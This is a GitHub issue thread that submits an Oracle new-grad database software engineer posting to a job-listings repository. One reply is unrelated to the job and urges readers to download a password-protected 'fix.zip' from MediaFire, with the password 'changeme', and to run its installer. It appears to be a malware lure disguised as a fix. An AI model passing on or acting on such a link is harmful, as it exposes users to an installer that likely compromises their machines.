### ISSUE TITLE
Oracle SWE Database

### ISSUE THREAD

**Issue by Ashishjob** [cvrve/New-Grad#256]
### Link to Job Posting

https://eeho.fa.us2.oraclecloud.com/hcmUI/CandidateExperience/en/sites/jobsearch/job/255972

### Company Name

Oracle

### Job Title

New Grad 2025: Software Engineer - Database Technologies

### Location

Austin, TX | Seattle, WA | Nashville, TN | Santa Clara, CA

### Does this job offer sponsorship?

Does Not Offer Sponsorship

### Is this internship currently accepting applications?

Yes

### Email associated with your GitHub account (Optional)

ashishjob104@gmail.com

### Extra Notes (Optional)

I'm not 100% positive about if it offers a sponsorship

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
